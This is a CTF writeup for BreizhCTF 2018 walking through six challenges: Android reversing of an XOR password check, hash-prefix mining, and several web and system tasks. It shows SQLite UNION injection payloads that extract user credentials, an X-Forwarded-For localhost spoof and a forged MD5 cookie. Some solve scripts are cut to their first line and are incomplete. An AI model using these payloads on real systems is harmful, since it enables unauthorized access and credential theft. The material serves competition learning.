## Information

### Version

| By | Version | Comment |
|---|---|---|
| noraj | 1.0 | Creation |

### CTF
- Name: BreizhCTF 2k18
- Website: www.breizhctf.com
- Type: On site
- Format: Jeopardy
## 75 - BabyAPK - Mobile

Android reverse for dummies!
I already wrote how to decompile a mobile application for the Prime challenge at HITB CTF Singapore 2017.
Manually:

- Unpack the `app.apk` file (assets, resources, compiled code, etc.):

```shell
apktool d -r -s app.apk
```

- Convert the Dex bytecode to Java classes:

```shell
d2j-dex2jar app/classes.dex
```

- Now take a look at the source:

```shell
jd-gui classes-dex2jar.jar
```

Automatically:

```shell
jadx-gui app.apk
```
The challenge is only about reversing a basic authentication scheme that XORs the password with a hardcoded key:

```java
private boolean isPasswordValid(String password) {
```

So let's use a short Ruby script:

```ruby
str1 = ")79$#!&#^l\t<v\x00Q\x17\x11HOXyD2k:!\x18\x040@xy\x089g0\x01_\t\x1c#oGF^"
```
The flag was `BZHCTF{w3_4r3_r34lly_gl4d_70_533_y0u_w3lc0me}`.
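To make the scheme concrete, here is an added example (my own reconstruction in Ruby, not the challenge's Java code nor the original solve script) of an XOR-with-hardcoded-key password check and why it collapses under reversing: XOR is its own inverse, so whoever reads the key and the expected bytes out of the APK gets the password back in one pass. `KEY`, `EXPECTED` and the plaintext `s3cr3t` are constructed sample values, not the challenge's.

```ruby
# Added example: XOR-with-hardcoded-key "authentication" and its reversal.
# KEY and EXPECTED are constructed sample values (not from the challenge APK);
# EXPECTED is xor_with_key("s3cr3t", KEY), precomputed so the plaintext does
# not appear literally in this "app".
KEY = "k3y".b
EXPECTED = "\x18\x00\x1A\x19\x00\x0D".b

# Repeating-key XOR over raw bytes; the same function encrypts and decrypts.
def xor_with_key(data, key)
  data.bytes.each_with_index.map { |b, i| b ^ key.getbyte(i % key.bytesize) }.pack("C*")
end

# What the app does: XOR the submitted password with KEY and compare to EXPECTED.
def password_valid?(password)
  xor_with_key(password.b, KEY) == EXPECTED
end

# What the reverser does: the same XOR applied to EXPECTED yields the password.
def recover_password(expected = EXPECTED, key = KEY)
  xor_with_key(expected, key)
end

# Even without locating KEY: XOR of one known plaintext/ciphertext pair is the
# key stream, which for a repeating key is the key itself, repeated.
def key_stream(plaintext, ciphertext)
  xor_with_key(plaintext.b, ciphertext)
end
```

`password_valid?("s3cr3t")` is true and `recover_password` returns that same string without any guessing, which is exactly what the script above does with `str1`. The defensive takeaway: a check the client can perform is a check the client can invert, so password verification belongs on a server behind a salted, slow hash, not inside the APK.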
## 100 - BreizhK0inM1n3r - Programming

Bitcoin is dead... I mean almost dead! So SaxX decided to launch a new service! Time to earn some breizhcoins!

IP: 148.60.87.243, port: 9200
For this challenge we needed to generate 42 valid breizhcoin addresses. An address is a SHA-512 hash beginning with `1337`. To prove we are not cheating, we need to send the clear text that results in such an address.

```ruby
require 'socket'
```
As the Wi-Fi network was terrible, I had to generate the list of clear-text values offline...:

```ruby
require 'digest'
```

... and send them manually:

```
26545
```
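An added Ruby example (not the original solve script, of which only the first lines survive above) of the search for preimages: hash candidate strings with SHA-512 until the hex digest starts with `1337`, and validate a claimed coin the way the server has to. Using the decimal counter `0, 1, 2, ...` as the candidate space is my assumption, chosen because the value sent manually above (`26545`) looks like one.

```ruby
require 'digest'

# Find `count` distinct clear-text values whose SHA-512 hex digest starts with
# `prefix`. Candidates are the decimal strings "0", "1", "2", ... (an assumption
# made here; the challenge accepted any clear text).
def mine_breizhcoins(count, prefix = "1337", start = 0)
  found = []
  i = start
  while found.size < count
    candidate = i.to_s
    found << candidate if Digest::SHA512.hexdigest(candidate).start_with?(prefix)
    i += 1
  end
  found
end

# Server-side check: a claimed coin is only valid if its clear text really
# hashes to the required prefix.
def valid_breizhcoin?(clear, prefix = "1337")
  Digest::SHA512.hexdigest(clear).start_with?(prefix)
end

# Rough work estimate: each hex character fixes 4 bits, so a p-character
# prefix costs about 16**p hash evaluations per coin on average.
def expected_tries(prefix)
  16**prefix.length
end
```

`mine_breizhcoins(42)` reproduces the challenge's workload: about 65,536 SHA-512 evaluations per coin, so roughly 2.7 million in total, which is seconds of CPU and the reason a laggy link rather than the hashing was the bottleneck. Each coin goes to the server as one line with `TCPSocket`, as the `require 'socket'` above suggests.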
The flag was `BZHCTF{Such_4_Pitty_S33m5_d47_b17c0in_c0ll4ps3d_Bu7_BreizhC0in_M19H7_B3_4n_4lt3n4t1v3!}`.
## 100 - Basique Simple Simple Basique - Web

You don't have the basics!
First the server tells us we are not coming from localhost, so I used the `X-Forwarded-For: 127.0.0.1` HTTP header to trick it.

Afterward I added the header in Burp so I would not have to repeat it for each request.
Now the server is asking for authentication. We can see we have a cookie, so let's decode it:

```shell
$ printf %s 'ZmFsc2U2ODkzNGEzZTk0NTVmYTcyNDIwMjM3ZWIwNTkwMjMyNw==' | base64 -d
```

It looks like `false` concatenated with an MD5 hash. After cracking the hash we found it was the MD5 of `false`.

So I built the same pattern for `true`:

```shell
$ printf %s 'true' | md5sum
```
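The cookie construction as an added Ruby example (not the page's own commands): parse the challenge cookie quoted above into its value and MD5 tag, forge the `true` variant the same way the server does, and, as the contrast a defender wants, tag the value with an HMAC under a server-side secret so that a client who knows the format still cannot forge one. The HMAC variant and the secret are my assumptions about a fix; the cookie value is the one from the writeup.

```ruby
require 'base64'
require 'digest'
require 'openssl'

# Cookie from the challenge: base64("false" + md5("false")).
COOKIE = 'ZmFsc2U2ODkzNGEzZTk0NTVmYTcyNDIwMjM3ZWIwNTkwMjMyNw=='

# Split the decoded cookie into its value and the 32-hex-char MD5 that follows,
# and report whether the tag really is md5(value).
def parse_cookie(cookie)
  raw = Base64.strict_decode64(cookie)
  return nil if raw.length <= 32
  value = raw[0, raw.length - 32]
  digest = raw[-32, 32]
  { value: value, digest: digest, matches: digest == Digest::MD5.hexdigest(value) }
end

# Build a cookie for any value exactly as the server does: no secret involved,
# so anyone who knows the format can mint one.
def forge_cookie(value)
  Base64.strict_encode64(value + Digest::MD5.hexdigest(value))
end

# Constant-time comparison so a forger cannot time the tag check byte by byte.
def constant_time_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Hardened variant (an assumption about a fix, not the challenge's code): tag the
# value with HMAC-SHA256 under a secret that never leaves the server.
def sign_cookie(value, secret)
  Base64.strict_encode64(value + OpenSSL::HMAC.hexdigest('SHA256', secret, value))
end

# Returns the trusted value, or nil if the tag is missing or does not verify.
def verify_signed_cookie(cookie, secret)
  raw = Base64.strict_decode64(cookie)
  return nil if raw.length <= 64
  value = raw[0, raw.length - 64]
  tag = raw[-64, 64]
  expected = OpenSSL::HMAC.hexdigest('SHA256', secret, value)
  constant_time_equal?(tag, expected) ? value : nil
end
```

`forge_cookie('true')` yields the cookie used for the next step; `verify_signed_cookie(forge_cookie('true'), secret)` returns nil because a bare MD5 is not a signature. An unkeyed hash only proves the value was not corrupted in transit, never who produced it.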
After sending this cookie we are redirected to http://148.60.87.243:44915/Si_cest_marque_sur_internet_cest_ptetre_faux_mais_cest_ptetre_vrai:

```html
<head><title>This is not the best language</title></head><body><h1>Welcome, Admin</h1><script src="http://cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script><div id="flag">flag</div><div id="doc"></div></body><script>$("#flag").click(function(){
```
The flag was `BZHCTF{Ok_You_G0t_m3_It_was_T0o_eASy_4_YoU}`.
## 150 - Checksum Your Booty - Web

This website uses a strong signature to protect against attacks. Prove to them that they suck.

This form is vulnerable to SQL injection (SQLi) and uses SQLite as its backend.
So we can retrieve the table name:

- payload: `" UNION SELECT tbl_name,1 FROM sqlite_master LIMIT 1;-- -`
- output: `Welcome login !`

Then the login and password of the first user:

- payload 1: `" UNION SELECT login,1 FROM login LIMIT 1 OFFSET 0;-- -`
- output 1: `Welcome bzhctf !`
- payload 2: `" UNION SELECT password,1 FROM login LIMIT 1 OFFSET 0;-- -`
- output 2: `Welcome bar !`

Finally we get the password of the second user:

- payload: `" UNION SELECT password,1 FROM login LIMIT 1 OFFSET 1;-- -`
- output: `Welcome bzhctf{s1gn_my_455} !`
The flag was `bzhctf{s1gn_my_455}`.
## 50 - BabySys - System

Hyper easy command injection:

```shell
$ nc 148.60.87.243 50050
```
The flag was `BZHCTF{wh3n_1_s4y_C0w_Y0u_s4y_C0w}`.
## 250 - Not Dead Yet - Programming

Answer quickly to all the questions to get the flag.

IP: 148.60.87.243, port: 9100
The server asks us the age at death of famous people. So we fetch each person's birth date and death date and deduce the age at death with a Ruby script pulling its data from Wikidata:

```ruby
require 'socket'
```

The challenge server was too unstable, laggy and buggy to let us get the flag, but the script was fully working.
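The age computation as an added Ruby example (not the page's solve script): pull the date of birth (Wikidata property `P569`) and date of death (`P570`) out of an entity record and derive the age at death in completed years, subtracting one when the person died before their birthday that year, which is the off-by-one a naive year subtraction gets wrong. The JSON is a constructed sample in the shape of a `wbgetentities` response, trimmed to the fields used; the HTTP fetch and the socket dialogue with the challenge server are left out, and day-level precision (Wikidata precision 11) is assumed for both dates.

```ruby
require 'json'
require 'date'

# Wikidata property ids: P569 = date of birth, P570 = date of death.
BIRTH = 'P569'
DEATH = 'P570'

# Constructed sample shaped like a wbgetentities response, trimmed to the
# fields used here; the dates are Albert Einstein's (Q937).
SAMPLE_JSON = <<~WD
  {"entities": {"Q937": {"claims": {
    "P569": [{"mainsnak": {"datavalue": {"value": {"time": "+1879-03-14T00:00:00Z", "precision": 11}}}}],
    "P570": [{"mainsnak": {"datavalue": {"value": {"time": "+1955-04-18T00:00:00Z", "precision": 11}}}}]
  }}}}
WD

# Wikidata times look like "+1879-03-14T00:00:00Z": drop the sign, keep the date
# part. Day precision is assumed; lower precisions encode unknown parts as 00
# and would need special handling.
def parse_wikidata_time(str)
  Date.strptime(str.sub(/\A[+-]/, '')[0, 10], '%Y-%m-%d')
end

# Age in completed years: one less than the year difference if the death date
# falls before the birthday in the year of death.
def age_at_death(birth, death)
  years = death.year - birth.year
  before_birthday = death.month < birth.month ||
                    (death.month == birth.month && death.day < birth.day)
  before_birthday ? years - 1 : years
end

# Map every entity in the response to its age at death; entities without both
# dates (still alive, or unknown) are skipped rather than guessed.
def ages_from_entities(json)
  JSON.parse(json)['entities'].each_with_object({}) do |(qid, entity), out|
    claims = entity['claims']
    b = claims.dig(BIRTH, 0, 'mainsnak', 'datavalue', 'value', 'time')
    d = claims.dig(DEATH, 0, 'mainsnak', 'datavalue', 'value', 'time')
    next if b.nil? || d.nil?
    out[qid] = age_at_death(parse_wikidata_time(b), parse_wikidata_time(d))
  end
end
```

`ages_from_entities(SAMPLE_JSON)` returns `{"Q937" => 76}`; the answer the challenge wanted is that integer, so the birthday comparison is what decides between a right and a wrong reply for anyone who died in the months before their birthday.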